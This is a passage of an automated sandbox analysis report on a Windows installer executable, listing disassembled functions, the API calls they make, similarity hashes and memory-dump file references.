                                                                                                                                                                                                                                                                                                                            • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                                                            • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                                                                                                                                                                                                                                            Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                                                            • String ID: nsa
                                                                                                                                                                                                                                                                                                                            • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                                                            • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                                                                                                                                                                            Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: HideWindow
                                                                                                                                                                                                                                                                                                                            • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                                                                            Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                                                                            Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                                                                            Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                                            • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                                                                            Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                                                                                            Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                                                                                                            Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                                                                                                                                                            Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                                                            • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                                                                                                                                                            Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend
